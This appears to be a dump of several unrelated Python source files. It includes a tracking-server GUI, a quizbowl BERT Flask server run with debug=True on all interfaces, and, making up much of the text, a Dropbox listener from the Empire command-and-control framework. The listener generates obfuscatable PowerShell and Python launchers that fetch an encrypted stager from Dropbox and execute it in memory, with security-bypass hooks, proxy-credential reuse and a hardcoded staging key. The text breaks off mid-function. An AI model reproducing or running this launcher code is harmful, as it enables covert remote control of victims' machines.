for k in config.items('devices_power'):
self.devices_list[k[0]]['power'] = k[1]
if k[0] + '_role_power' in self.root.ids.keys():
self.root.ids[k[0] + '_role_power'].text = k[1]
for k in config.items('devices_sleep'):
self.devices_list[k[0]]['sleep'] = int(k[1])
if k[0] + '_role_sleep' in self.root.ids.keys():
self.root.ids[k[0] + '_role_sleep'].active = bool(int(k[1]))
filename = file.split('\\')[-1]
self.root.ids.save_load_text.text = '{} loaded'.format(filename)
self.update_settings(file)
except:
self.root.ids.save_load_text.text = 'Invalid file or version'
else:
self.root.ids.save_load_text.text = 'Invalid file or version'
def update_settings(self, filepath):
config = ConfigParser()
config.add_section('last_settings')
config.set('last_settings', 'path', filepath)
with open(self.settings_bak, 'w') as f:
config.write(f)
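# Illustrative note (not part of the original app): the backup written above is a plain
# ConfigParser file, so the generated imuFBT_settings.cfg would look roughly like:
#
#   [last_settings]
#   path = C:\Users\<user>\Documents\imuFBT\my_profile.cfg
#
# where the profile filename is hypothetical. on_start() below reads this path back and
# re-loads the last used profile automatically.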
def on_start(self):
self.title = 'IMU FBT Server'
dir_path = os.path.join(os.path.expanduser('~'),
'Documents', 'imuFBT')
if not os.path.isdir(dir_path):
os.mkdir(dir_path)
self.settings_bak = os.path.join(dir_path, 'imuFBT_settings.cfg')
if os.path.isfile(self.settings_bak):
try:
config = ConfigParser()
config.read(self.settings_bak)
self.load(config.get('last_settings', 'path'))
except:
pass
self.bridgePort = 0
self.backend_run = True
self.backend_process = threading.Thread(target=self.backend, args=())
self.backend_process.start()
self.clock1 = Clock.schedule_interval(self.com_port_scanner, 3)
self.clock2 = Clock.schedule_once(self.delay_cb, 0.5)
def backend(self):
exe_path = resource_path(os.path.join('backend', 'imuFBTServerBackend.exe'))
while self.backend_run:
self.backend_exe = subprocess.Popen([exe_path], creationflags = subprocess.CREATE_NO_WINDOW)
self.backend_exe.wait()
time.sleep(1)
def delay_cb(self, dt):
self.thread_run = True
self.thread_process = threading.Thread(target=self.udp, args=())
self.thread_process.start()
self.broad_run = True
self.broad_process = threading.Thread(target=self.broadudp, args=())
self.broad_process.start()
def on_stop(self):
try:
self.clock1.cancel()
except:
pass
try:
self.clock2.cancel()
except:
pass
self.wifi_thread_run = False
try:
self.wifi_thread_process.join()
except:
pass
self.calibrate_run = False
try:
self.calibrate_process.join()
except:
pass
self.broad_run = False
try:
self.broad_process.join()
except:
pass
self.thread_run = False
try:
self.thread_process.join()
except:
pass
self.backend_run = False
try:
self.backend_exe.terminate()
self.backend_process.join()
except:
pass
self.fLock.close()
os.remove(self.lock_file)
def build(self):
dir_path = os.path.join(os.path.expanduser('~'),
'Documents', 'imuFBT')
if not os.path.isdir(dir_path):
os.mkdir(dir_path)
self.lock_file = os.path.join(dir_path, 'lock')
try:
os.remove(self.lock_file)
except PermissionError:
return sys.exit()
except FileNotFoundError:
pass
self.fLock = open(self.lock_file, 'w')
return Builder.load_file(resource_path('main.kv'))
if __name__ == '__main__':
ImuFbtServer().run()
|
moviepy_test.py
|
#!/usr/bin/env python3
from pathlib import Path
from mpl_toolkits.mplot3d import Axes3D
import rospy
import glob
import numpy as np
import matplotlib.pyplot as plt
import mayavi.mlab as mlab
import moviepy.editor as mpy
import torch
from multiprocessing import Process
from pcdet.config import cfg, cfg_from_yaml_file
from pcdet.datasets import DatasetTemplate
from pcdet.models import build_network, load_data_to_gpu
from pcdet.utils import common_utils
from visual_utils import visualize_utils as V
from std_msgs.msg import String
from sensor_msgs.msg import PointCloud2
import sensor_msgs.point_cloud2 as pc2
def LiDARSubscriber(data):
rospy.loginfo(rospy.get_caller_id())
temp_list = []
for point in pc2.read_points(data, skip_nans=True, field_names=('x', 'y', 'z')):
temp_list.append([point[0], point[1], point[2], 0])
pc_data = np.array(temp_list, dtype=np.float32)
#print(np.shape(self.pc_data), self.pc_data[0])
#np.save('my_data3.npy', self.pc_data)
#self.pc_data.astype(np.float32).tofile('my_data2.bin')
@mlab.animate
def anim():
x, y = np.mgrid[0:3:1,0:3:1]
s = mlab.surf(x, y, np.asarray(x*0.1, 'd'))
for i in range(100000):
s.mlab_source.scalars = np.asarray(x*0.1*(i+1), 'd')
yield
anim()
mlab.show()
if __name__ == '__main__':
#rospy.init_node('LiDAR_listener', anonymous=True)
#rospy.Subscriber('/points_raw', PointCloud2, LiDARSubscriber)
# @mlab.animate
# def anim():
# for i in range(100000):
# s.mlab_source.scalars = np.asarray(x*0.1*(i+1), 'd')
# yield
# anim()
# mlab.show()
vis = Process(target=anim)
vis.start()
#rospy.spin()
#node = PointCloudData()
#node.main()
# x, y = np.mgrid[0:3:1,0:3:1]
# s = mlab.surf(x, y, np.asarray(x*0.1, 'd'))
# data = np.load('data/my_data3.npy')
# x, y, z, _ = np.transpose(data)
# value = np.ones(9407)
# print(np.shape(x), np.shape(y), np.shape(z), np.shape(value), value)
# mlab.points3d(x, y, z, scale_factor=.25)
# mlab.show()
|
ProcessLineReaderWin.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@copyright: (c)Copyright 2013, Intel Corporation All Rights Reserved.
The source code contained or described here in and all documents related
to the source code ("Material") are owned by Intel Corporation or its
suppliers or licensors. Title to the Material remains with Intel Corporation
or its suppliers and licensors. The Material contains trade secrets and
proprietary and confidential information of Intel or its suppliers and
licensors.
The Material is protected by worldwide copyright and trade secret laws and
treaty provisions. No part of the Material may be used, copied, reproduced,
modified, published, uploaded, posted, transmitted, distributed, or disclosed
in any way without Intel's prior express written permission.
No license under any patent, copyright, trade secret or other intellectual
property right is granted to or conferred upon you by disclosure or delivery
of the Materials, either expressly, by implication, inducement, estoppel or
otherwise. Any license under such intellectual property rights must be express
and approved by Intel in writing.
@organization: INTEL MCG PSI
@summary: This module implements a Windows line reader object
@since: 31/07/14
@author: sfusilie
"""
from threading import Thread
from Queue import Queue, Empty
class ProcessLineReaderWin(object):
"""
LineReader object to be used as a select-style readable input
"""
MAX_LINES_TO_READ = 500
def __init__(self, name, process, stream):
"""
:type name: str
:param name: name of the process line reader object
:type process: process
:param process: process to read from
:type stream: int
:param stream: stream file descriptor
"""
# Nice name to ease debugging between different ProcessLineReaderWin
# We usually have 2: one for stdout, one for stderr
self.name = name
# Process to work on
self._process = process
# Stream to read data from
self._stream = stream
# Reader thread
self._reader_thread = None
# Internal buffer
self._lines_queue = Queue()
# Start reading
self.start_read()
def _read_worker(self):
"""
Reader thread that will retrieve data from the stream
"""
for line in iter(self._stream.readline, ''):
line = line.rstrip("\n")
if line:
self._lines_queue.put(line)
self._stream.close()
def stop_read(self):
"""
Notify the line reader that we want to stop reading
"""
pass
def start_read(self):
"""
Notify the line reader that we want to start reading
A new reader thread will be started to retrieve data from the stream
"""
self._reader_thread = Thread(target=self._read_worker)
self._reader_thread.name = "{0} process reader line thread".format(self.name)
self._reader_thread.daemon = True
self._reader_thread.start()
def read_lines(self):
"""
Method to return lines from data read from file descriptor.
Complete lines are returned.
:return: Array of complete lines
"""
lines = []
process_terminated = self._process.poll() is not None
try:
data = self._lines_queue.get_nowait()
for line in data.splitlines():
lines.append(line)
except Empty:
pass
if not lines and process_terminated:
# Nothing more to read
lines = None
return lines
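# Minimal usage sketch (not part of the original module), assuming a process started by
# the caller with subprocess.Popen; the command and variable names below are arbitrary
# examples, not part of the original API.
if __name__ == "__main__":
    import subprocess
    import time

    # Start any console process whose output we want to read without blocking.
    proc = subprocess.Popen(["ping", "127.0.0.1"],
                            stdout=subprocess.PIPE,
                            universal_newlines=True)
    reader = ProcessLineReaderWin("stdout", proc, proc.stdout)
    while True:
        lines = reader.read_lines()
        if lines is None:
            # Process terminated and the internal queue is drained.
            break
        for line in lines:
            print(line)
        time.sleep(0.1)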
|
ProjectServer.py
|
from typing import List, Optional, Tuple
from collections import defaultdict
import pickle
import json
from os import path
import threading
import click
from tqdm import tqdm
from flask import Flask, jsonify, request
from qanta.ProjectModel import *
from qanta.ProjectDataLoader import *
from qanta import util
if (torch.cuda.is_available()):
print("CUDA is available")
else:
print("CPU only")
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
CACHE_LOCATION = "/src/cache"
VOCAB_LOCATION = "/src/data/QuizBERT.vocab"
DATA_MANAGER_LOCATION = "/src/data/QBERT_Data.manager"
MODEL_LOCATION = "/src/data/QuizBERT.model"
TRAIN_FILE_LOCATION = "/src/data/qanta.train.2018.04.18.json"
TEST_FILE_LOCATION = "/src/data/qanta.test.2018.04.18.json"
TRAINING_PROGRESS_LOCATION = "training_progress"
BUZZTRAIN_LOCATION = "/src/data/buzztrain.json"
LOCAL_CACHE_LOCATION = "cache"
LOCAL_VOCAB_LOCATION = "/src/data/QuizBERT.vocab"
LOCAL_MODEL_LOCATION = "/src/data/QuizBERT.model"
LOCAL_TRAINING_PROGRESS_LOCATION = "train_progress"
MAX_QUESTION_LENGTH = 412
BATCH_SIZE = 15
#=======================================================================================================
# Combines guesser and buzzer outputs
#=======================================================================================================
def guess_and_buzz(guesser, text):
out = guesser.guess(text)
return (out, False)
#=======================================================================================================
# Combines batch guesser and buzzer outputs
#=======================================================================================================
def batch_guess_and_buzz(guesser, text):
out = guesser.batch_guess(text)
return [(g, False) for g in out]
#=======================================================================================================
# Executed in a separate thread so that the model can load without holding up the server.
#=======================================================================================================
def load_model(callback, vocab_file, model_file):
tokenizer = BertTokenizer.from_pretrained("bert-large-uncased", cache_dir=CACHE_LOCATION)
vocab = load_vocab(vocab_file)
#agent = BERTAgent(QuizBERT(25970, cache_dir=CACHE_LOCATION), vocab)
agent = BERTAgent(None, vocab)
agent.load_model(model_file)
agent.model_set_mode("eval")
callback(agent, tokenizer)
#=======================================================================================================
# Generates guesses for quizbowl questions using the model.
#=======================================================================================================
class Project_Guesser():
def __init__(self, vocab_file, model_file):
print("Loading model")
self.agent = None
self.tokenizer = None
self.ready = False
self.load_thread = threading.Thread(target=load_model, args=[self.load_callback, vocab_file, model_file])
self.load_thread.start()
# Called with one question string
def guess(self, text):
if (not self.ready):
self.load_thread.join()
# Tokenize question
encoded_question = torch.LongTensor([encode_question(text, self.tokenizer, MAX_QUESTION_LENGTH)]).to(device)
print(encoded_question)
output = self.agent.model_forward(encoded_question)
print(self.agent.vocab.decode_top_n(output.cpu(), 10))
print(self.agent.model.get_last_pooler_output())
guesses = self.agent.vocab.decode(output)[0]
return guesses
# called with an array of questions, returns a guess batch
def batch_guess(self, text):
if (not self.ready):
self.load_thread.join()
# Tokenize questions
encoded_questions = torch.LongTensor([encode_question(t, self.tokenizer, MAX_QUESTION_LENGTH) for t in text]).to(device)
output = self.agent.model_forward(encoded_questions)
guess = self.agent.vocab.decode(output)
return [x for x in guess]
# Called to determine if the model has been loaded
def isReady(self):
return self.ready
# Called after the loading thread is finished
def load_callback(self, agent, tokenizer):
self.agent = agent
self.tokenizer = tokenizer
self.ready = True
print("Model is loaded!")
#=======================================================================================================
# Called to start qb server.
#=======================================================================================================
def create_app(vocab_file, model_file):
guesser = Project_Guesser(vocab_file, model_file)
app = Flask(__name__)
@app.route('/api/1.0/quizbowl/act', methods=['POST'])
def act():
question = request.json['text']
guess, buzz = guess_and_buzz(guesser, question)
return jsonify({'guess': guess, 'buzz': True if buzz else False})
@app.route('/api/1.0/quizbowl/status', methods=['GET'])
def status():
print(guesser.isReady())
return jsonify({
'batch': True,
'batch_size': 10,
'ready': guesser.isReady(),
'include_wiki_paragraphs': False
})
@app.route('/api/1.0/quizbowl/batch_act', methods=['POST'])
def batch_act():
questions = [q['text'] for q in request.json['questions']]
return jsonify([
{'guess': guess, 'buzz': True if buzz else False}
for guess, buzz in batch_guess_and_buzz(guesser, questions)
])
return app
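# Illustrative client-side sketch (not part of the original server). It assumes the app is
# running locally on the default port used by the `web` command below (4861) and that the
# `requests` package is installed; the sample question text is arbitrary.
#
#   import requests
#   resp = requests.post('http://localhost:4861/api/1.0/quizbowl/act',
#                        json={'text': 'This author wrote Pride and Prejudice.'})
#   print(resp.json())  # -> {'guess': ..., 'buzz': ...}
#   print(requests.get('http://localhost:4861/api/1.0/quizbowl/status').json())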
#=======================================================================================================
# Click commands for sending server arguments.
#=======================================================================================================
@click.group()
def cli():
pass
# starts the qb answer server
@cli.command()
@click.option('--host', default='0.0.0.0')
@click.option('--port', default=4861)
#@click.option('--disable-batch', default=False, is_flag=True)
@click.option('--vocab_file', default=VOCAB_LOCATION)
@click.option('--model_file', default=MODEL_LOCATION)
def web(host, port, vocab_file, model_file):
app = create_app(vocab_file, model_file)
print("Starting web app")
app.run(host=host, port=port, debug=True)
# run to train the model - vocab_file and train_file are required!
@cli.command()
@click.option('--vocab_file', default=VOCAB_LOCATION)
@click.option('--train_file', default=TRAIN_FILE_LOCATION)
@click.option('--data_limit', default=-1)
@click.option('--epochs', default=1)
@click.option('--resume', default=False, is_flag=True)
@click.option('--resume_file', default="")
@click.option('--preloaded_manager', default=False, is_flag=True)
@click.option('--manager_file', default=DATA_MANAGER_LOCATION)
@click.option('--save_regularity', default=20)
@click.option('--category_only', default=False, is_flag=True)
def train(vocab_file, train_file, data_limit, epochs, resume, resume_file, preloaded_manager, manager_file, save_regularity, category_only):
print("Loading resources...", flush = True)
tokenizer = BertTokenizer.from_pretrained("bert-large-uncased", cache_dir=CACHE_LOCATION)
vocab = load_vocab(vocab_file)
data = None
agent = None
if (preloaded_manager):
data = load_data_manager(manager_file)
data.batch_size = BATCH_SIZE # set the correct batch size
else:
data = Project_BERT_Data_Manager(MAX_QUESTION_LENGTH, vocab, BATCH_SIZE, tokenizer)
data.load_data(train_file, data_limit, category_only=category_only)
if (resume):
agent = BERTAgent(None, vocab)
agent.load_model(resume_file, data)
else:
agent = BERTAgent(QuizBERT(data.get_answer_vector_length(), cache_dir=CACHE_LOCATION), vocab)
print("Finished loading - commence training.", flush = True)
#agent.model_set_mode("train")
current_epoch = data.full_epochs
while (current_epoch < epochs):
current_epoch = data.full_epochs
agent.train_epoch(data, save_regularity, TRAINING_PROGRESS_LOCATION)
agent.save_model({"epoch":data.full_epochs, "completed":True}, TRAINING_PROGRESS_LOCATION + "/QuizBERT.model")
print("Training completed - " + str(epochs) + " full epochs", flush = True)
# High-efficiency evaluation - has an option to generate buzztrain file
@cli.command()
#@click.option('--disable-batch', default=False, is_flag=True)
@click.option('--vocab_file', default=VOCAB_LOCATION)
@click.option('--model_file', default=MODEL_LOCATION)
@click.option('--split_sentences', default=False, is_flag=True)
@click.option('--dobuzztrain', default=False, is_flag=True)
@click.option('--buzztrainfile', default=BUZZTRAIN_LOCATION)
@click.option('--preloaded_manager', default=False, is_flag=True)
@click.option('--manager_file', default=DATA_MANAGER_LOCATION)
@click.option('--data_file', default=TEST_FILE_LOCATION)
@click.option('--top_k', default=10)
@click.option('--category_only', default=False, is_flag=True)
def evaluate(vocab_file, model_file, split_sentences, dobuzztrain, buzztrainfile, preloaded_manager, manager_file, data_file, top_k, category_only):
tokenizer = BertTokenizer.from_pretrained("bert-large-uncased", cache_dir=CACHE_LOCATION)
vocab = load_vocab(vocab_file)
data = None
agent = None
save_loc = None
if (dobuzztrain):
save_loc = buzztrainfile
agent = BERTAgent(None, vocab)
agent.load_model(model_file, data)
if (preloaded_manager):
data = load_data_manager(manager_file)
data.batch_size = BATCH_SIZE # set the correct batch size
else:
data = Project_BERT_Data_Manager(MAX_QUESTION_LENGTH, vocab, BATCH_SIZE, tokenizer)
data.load_data(data_file, -1, split_sentences=split_sentences, category_only=category_only)
print("Finished loading - commence evaluation.", flush = True)
agent.model_evaluate(data, save_loc, top_k)
print("Finished evaluation")
# Run to generate vocab file in specified location using specified data file.
@cli.command()
@click.option('--save_location', default=VOCAB_LOCATION)
@click.option('--data_file', default=TRAIN_FILE_LOCATION)
@click.option('--category_only', default=False, is_flag=True)
def vocab(save_location, data_file, category_only):
answer_vocab_generator(data_file, save_location, category_only=category_only)
# Run to generate data manager file in specified location using specified data file.
@cli.command()
@click.option('--vocab_location', default=VOCAB_LOCATION)
@click.option('--save_location', default=DATA_MANAGER_LOCATION)
@click.option('--data_file', default=TRAIN_FILE_LOCATION)
@click.option('--limit', default=-1)
@click.option('--category_only', default=False, is_flag=True)
def makemanager(vocab_location, save_location, data_file, limit, category_only):
vocab = load_vocab(vocab_location)
tokenizer = BertTokenizer.from_pretrained("bert-large-uncased", cache_dir=CACHE_LOCATION)
loader = Project_BERT_Data_Manager(MAX_QUESTION_LENGTH, vocab, BATCH_SIZE, tokenizer)
loader.load_data(data_file, limit, category_only=category_only)
save_data_manager(loader, save_location)
# Run to check if cuda is available.
@cli.command()
def cudatest():
print(device)
# Run once to download qanta data to data/. Runs inside the docker container, but results save to host machine
@cli.command()
@click.option('--local-qanta-prefix', default='data/')
#@click.option('--retrieve-paragraphs', default=False, is_flag=True) #retrieve_paragraphs
def download(local_qanta_prefix):
util.download(local_qanta_prefix, False)
if __name__ == '__main__':
print("Starting QB")
cli()
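# Example invocations (illustrative only; the module filename is an assumption, while the
# paths and defaults come from the constants and click options defined above):
#   python ProjectServer.py download --local-qanta-prefix data/
#   python ProjectServer.py vocab --save_location /src/data/QuizBERT.vocab --data_file /src/data/qanta.train.2018.04.18.json
#   python ProjectServer.py train --vocab_file /src/data/QuizBERT.vocab --epochs 1
#   python ProjectServer.py web --host 0.0.0.0 --port 4861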
|
dbx.py
|
from __future__ import print_function
import base64
import copy
import json
import os
import time
from builtins import object, str
from textwrap import dedent
from typing import List
import dropbox
from pydispatch import dispatcher
from empire.server.common import encryption, helpers, templating
from empire.server.database import models
from empire.server.database.base import Session
from empire.server.utils import data_util, listener_util
class Listener(object):
def __init__(self, mainMenu, params=[]):
self.info = {
"Name": "Dropbox",
"Author": ["@harmj0y"],
"Description": ("Starts a Dropbox listener."),
"Category": ("third_party"),
"Comments": [],
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
"Name": {
"Description": "Name for the listener.",
"Required": True,
"Value": "dropbox",
},
"APIToken": {
"Description": "Authorization token for Dropbox API communication.",
"Required": True,
"Value": "",
},
"PollInterval": {
"Description": "Polling interval (in seconds) to communicate with the Dropbox Server.",
"Required": True,
"Value": "5",
},
"BaseFolder": {
"Description": "The base Dropbox folder to use for comms.",
"Required": True,
"Value": "/Empire/",
},
"StagingFolder": {
"Description": "The nested Dropbox staging folder.",
"Required": True,
"Value": "/staging/",
},
"TaskingsFolder": {
"Description": "The nested Dropbox taskings folder.",
"Required": True,
"Value": "/taskings/",
},
"ResultsFolder": {
"Description": "The nested Dropbox results folder.",
"Required": True,
"Value": "/results/",
},
"Launcher": {
"Description": "Launcher string.",
"Required": True,
"Value": "powershell -noP -sta -w 1 -enc ",
},
"StagingKey": {
"Description": "Staging key for initial agent negotiation.",
"Required": True,
"Value": "2c103f2c4ed1e59c0b4e2e01821770fa",
},
"DefaultDelay": {
"Description": "Agent delay/reach back interval (in seconds).",
"Required": True,
"Value": 60,
},
"DefaultJitter": {
"Description": "Jitter in agent reachback interval (0.0-1.0).",
"Required": True,
"Value": 0.0,
},
"DefaultLostLimit": {
"Description": "Number of missed checkins before exiting",
"Required": True,
"Value": 10,
},
"DefaultProfile": {
"Description": "Default communication profile for the agent.",
"Required": True,
"Value": "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
},
"KillDate": {
"Description": "Date for the listener to exit (MM/dd/yyyy).",
"Required": False,
"Value": "",
},
"WorkingHours": {
"Description": "Hours for the agent to operate (09:00-17:00).",
"Required": False,
"Value": "",
},
"SlackURL": {
"Description": "Your Slack Incoming Webhook URL to communicate with your Slack instance.",
"Required": False,
"Value": "",
},
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
# set the default staging key to the controller db default
self.options["StagingKey"]["Value"] = str(
data_util.get_config("staging_key")[0]
)
def default_response(self):
"""
Returns a default HTTP server page.
"""
return ""
def validate_options(self):
"""
Validate all options for this listener.
"""
self.uris = [
a.strip("/")
for a in self.options["DefaultProfile"]["Value"].split("|")[0].split(",")
]
for key in self.options:
if self.options[key]["Required"] and (
str(self.options[key]["Value"]).strip() == ""
):
print(helpers.color('[!] Option "%s" is required.' % (key)))
return False
return True
def generate_launcher(
self,
encode=True,
obfuscate=False,
obfuscationCommand="",
userAgent="default",
proxy="default",
proxyCreds="default",
stagerRetries="0",
language=None,
safeChecks="",
listenerName=None,
bypasses: List[str] = None,
):
"""
Generate a basic launcher for the specified listener.
"""
bypasses = [] if bypasses is None else bypasses
if not language:
print(
helpers.color(
"[!] listeners/dbx generate_launcher(): no language specified!"
)
)
if (
listenerName
and (listenerName in self.threads)
and (listenerName in self.mainMenu.listeners.activeListeners)
):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName][
"options"
]
# host = listenerOptions['Host']['Value']
staging_key = listenerOptions["StagingKey"]["Value"]
profile = listenerOptions["DefaultProfile"]["Value"]
launcher = listenerOptions["Launcher"]["Value"]
staging_key = listenerOptions["StagingKey"]["Value"]
pollInterval = listenerOptions["PollInterval"]["Value"]
api_token = listenerOptions["APIToken"]["Value"]
baseFolder = listenerOptions["BaseFolder"]["Value"].strip("/")
staging_folder = "/%s/%s" % (
baseFolder,
listenerOptions["StagingFolder"]["Value"].strip("/"),
)
taskingsFolder = "/%s/%s" % (
baseFolder,
listenerOptions["TaskingsFolder"]["Value"].strip("/"),
)
resultsFolder = "/%s/%s" % (
baseFolder,
listenerOptions["ResultsFolder"]["Value"].strip("/"),
)
if language.startswith("po"):
# PowerShell
# replace with stager = '' for troubleshooting
stager = '$ErrorActionPreference = "SilentlyContinue";'
if safeChecks.lower() == "true":
stager = "If($PSVersionTable.PSVersion.Major -ge 3){"
for bypass in bypasses:
stager += bypass
stager += "};[System.Net.ServicePointManager]::Expect100Continue=0;"
stager += "$wc=New-Object System.Net.WebClient;"
if userAgent.lower() == "default":
profile = listenerOptions["DefaultProfile"]["Value"]
userAgent = profile.split("|")[1]
stager += f"$u='{ userAgent }';"
if userAgent.lower() != "none" or proxy.lower() != "none":
if userAgent.lower() != "none":
stager += "$wc.Headers.Add('User-Agent',$u);"
if proxy.lower() != "none":
if proxy.lower() == "default":
stager += (
"$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;"
)
else:
# TODO: implement form for other proxy
stager += f"""
$proxy=New-Object Net.WebProxy;
$proxy.Address = '{ proxy.lower() }';
$wc.Proxy = $proxy;
"""
if proxyCreds.lower() == "default":
stager += "$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;"
else:
# TODO: implement form for other proxy credentials
username = proxyCreds.split(":")[0]
password = proxyCreds.split(":")[1]
domain = username.split("\\")[0]
usr = username.split("\\")[1]
stager += f"""
$netcred = New-Object System.Net.NetworkCredential('{ usr }', '{ password }', '{ domain }');
$wc.Proxy.Credentials = $netcred;
"""
# save the proxy settings to use during the entire staging process and the agent
stager += "$Script:Proxy = $wc.Proxy;"
# TODO: reimplement stager retries?
# code to turn the key string into a byte array
stager += f"$K=[System.Text.Encoding]::ASCII.GetBytes('{staging_key}');"
# this is the minimized RC4 stager code from rc4.ps1
stager += listener_util.powershell_rc4()
stager += dedent(
f"""
# add in the Dropbox auth token and API params
$t='{ api_token }';
$wc.Headers.Add("Authorization","Bearer $t");
$wc.Headers.Add("Dropbox-API-Arg",\'{{"path":"{ staging_folder }/debugps"}}\');
$data=$wc.DownloadData('https://content.dropboxapi.com/2/files/download');
$iv=$data[0..3];$data=$data[4..$data.length];
# decode everything and kick it over to IEX to kick off execution
-join[Char[]](& $R $data ($IV+$K))|IEX
"""
)
# Remove comments and make one line
stager = helpers.strip_powershell_comments(stager)
stager = data_util.ps_convert_to_oneliner(stager)
if obfuscate:
stager = data_util.obfuscate(
self.mainMenu.installPath,
stager,
obfuscationCommand=obfuscationCommand,
)
# base64 encode the stager and return it
if encode and (
(not obfuscate) or ("launcher" not in obfuscationCommand.lower())
):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
elif language.startswith("py"):
launcherBase = "import sys;"
# monkey patch ssl woohooo
launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;"
try:
if safeChecks.lower() == "true":
launcherBase += listener_util.python_safe_checks()
except Exception as e:
p = "[!] Error setting LittleSnitch in stager: " + str(e)
print(helpers.color(p, color="red"))
if userAgent.lower() == "default":
profile = listenerOptions["DefaultProfile"]["Value"]
userAgent = profile.split("|")[1]
launcherBase += dedent(
f"""
import urllib.request;
UA='{ userAgent }';
t='{ api_token }';
server='https://content.dropboxapi.com/2/files/download';
req=urllib.request.Request(server);
req.add_header('User-Agent',UA);
req.add_header("Authorization","Bearer "+t);
req.add_header("Dropbox-API-Arg",'{{"path":"{ staging_folder }/debugpy"}}');
"""
)
if proxy.lower() != "none":
if proxy.lower() == "default":
launcherBase += "proxy = urllib.request.ProxyHandler();\n"
else:
proto = proxy.split(":")[0]
launcherBase += f"proxy = urllib.request.ProxyHandler({{'{proto}':'{proxy}'}});\n"
if proxyCreds != "none":
if proxyCreds == "default":
launcherBase += "o = urllib.request.build_opener(proxy);\n"
else:
launcherBase += "proxy_auth_handler = urllib.request.ProxyBasicAuthHandler();\n"
username = proxyCreds.split(":")[0]
password = proxyCreds.split(":")[1]
launcherBase += dedent(
f"""
proxy_auth_handler.add_password(None,'{ proxy }', '{ username }', '{ password }');
o = urllib.request.build_opener(proxy, proxy_auth_handler);
"""
)
else:
launcherBase += "o = urllib.request.build_opener(proxy);\n"
else:
launcherBase += "o = urllib.request.build_opener();\n"
# install proxy and creds globally, so they can be used with urlopen.
launcherBase += "urllib.request.install_opener(o);\n"
launcherBase += "a=urllib.request.urlopen(req).read();\n"
# RC4 decryption
launcherBase += listener_util.python_extract_stager(staging_key)
if encode:
launchEncoded = base64.b64encode(
launcherBase.encode("UTF-8")
).decode("UTF-8")
launcher = (
"echo \"import sys,base64;exec(base64.b64decode('%s'));\" | python3 &"
% (launchEncoded)
)
return launcher
else:
return launcherBase
else:
print(
helpers.color(
"[!] listeners/dbx generate_launcher(): invalid listener name specification!"
)
)
def generate_stager(
self, listenerOptions, encode=False, encrypt=True, language=None
):
"""
Generate the stager code needed for communications with this listener.
"""
if not language:
print(
helpers.color(
"[!] listeners/dbx generate_stager(): no language specified!"
)
)
return None
pollInterval = listenerOptions["PollInterval"]["Value"]
stagingKey = listenerOptions["StagingKey"]["Value"]
baseFolder = listenerOptions["BaseFolder"]["Value"].strip("/")
apiToken = listenerOptions["APIToken"]["Value"]
profile = listenerOptions["DefaultProfile"]["Value"]
workingHours = listenerOptions["WorkingHours"]["Value"]
stagingFolder = "/%s/%s" % (
baseFolder,
listenerOptions["StagingFolder"]["Value"].strip("/"),
)
if language.lower() == "powershell":
# read in the stager base
with open(
"%s/data/agent/stagers/dropbox.ps1" % (self.mainMenu.installPath)
) as f:
stager = f.read()
# patch the server and key information
stager = stager.replace("REPLACE_STAGING_FOLDER", stagingFolder)
stager = stager.replace("REPLACE_STAGING_KEY", stagingKey)
stager = stager.replace("REPLACE_POLLING_INTERVAL", pollInterval)
# patch in working hours, if any
if workingHours != "":
stager = stager.replace("WORKING_HOURS_REPLACE", workingHours)
unobfuscated_stager = ""
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
unobfuscated_stager += line
# base64 encode the stager and return it
if encode:
return helpers.enc_powershell(unobfuscated_stager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(
RC4IV + stagingKey.encode("UTF-8"),
unobfuscated_stager.encode("UTF-8"),
)
else:
# otherwise just return the case-randomized stager
return unobfuscated_stager
elif language.lower() == "python":
template_path = [
os.path.join(self.mainMenu.installPath, "/data/agent/stagers"),
os.path.join(self.mainMenu.installPath, "./data/agent/stagers"),
]
eng = templating.TemplateEngine(template_path)
template = eng.get_template("dropbox.py")
template_options = {
"staging_folder": stagingFolder,
"poll_interval": pollInterval,
"staging_key": stagingKey,
"profile": profile,
"api_token": apiToken,
}
stager = template.render(template_options)
if encode:
return base64.b64encode(stager)
if encrypt:
# return an encrypted version of the stager ("normal" staging)
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(
RC4IV + stagingKey.encode("UTF-8"), stager.encode("UTF-8")
)
else:
# otherwise return the standard stager
return stager
else:
print(
helpers.color(
"[!] listeners/http generate_stager(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."
)
)
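# Illustrative note (not part of the original listener): the encrypted stager returned above
# is framed as RC4IV (4 random bytes) followed by RC4(RC4IV + stagingKey, stager). A client
# holding the staging key could therefore recover the plaintext roughly as:
#
#   iv, body = blob[:4], blob[4:]
#   plaintext = encryption.rc4(iv + stagingKey.encode("UTF-8"), body)
#
# which mirrors the $iv=$data[0..3]; $data=$data[4..$data.length] logic emitted for the
# PowerShell launcher in generate_launcher() above.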
def generate_agent(
self,
listenerOptions,
language=None,
obfuscate=False,
obfuscationCommand="",
version="",
):
"""
Generate the full agent code needed for communications with this listener.
"""
if not language:
print(
helpers.color(
"[!] listeners/dbx generate_agent(): no language specified!"
)
)
return None
language = language.lower()
delay = listenerOptions["DefaultDelay"]["Value"]
jitter = listenerOptions["DefaultJitter"]["Value"]
profile = listenerOptions["DefaultProfile"]["Value"]
lostLimit = listenerOptions["DefaultLostLimit"]["Value"]
workingHours = listenerOptions["WorkingHours"]["Value"]
killDate = listenerOptions["KillDate"]["Value"]
b64DefaultResponse = base64.b64encode(self.default_response().encode("UTF-8"))
if language == "powershell":
with open(self.mainMenu.installPath + "/data/agent/agent.ps1") as f:
code = f.read()
# patch in the comms methods
commsCode = self.generate_comms(
listenerOptions=listenerOptions, language=language
)
code = code.replace("REPLACE_COMMS", commsCode)
# strip out comments and blank lines
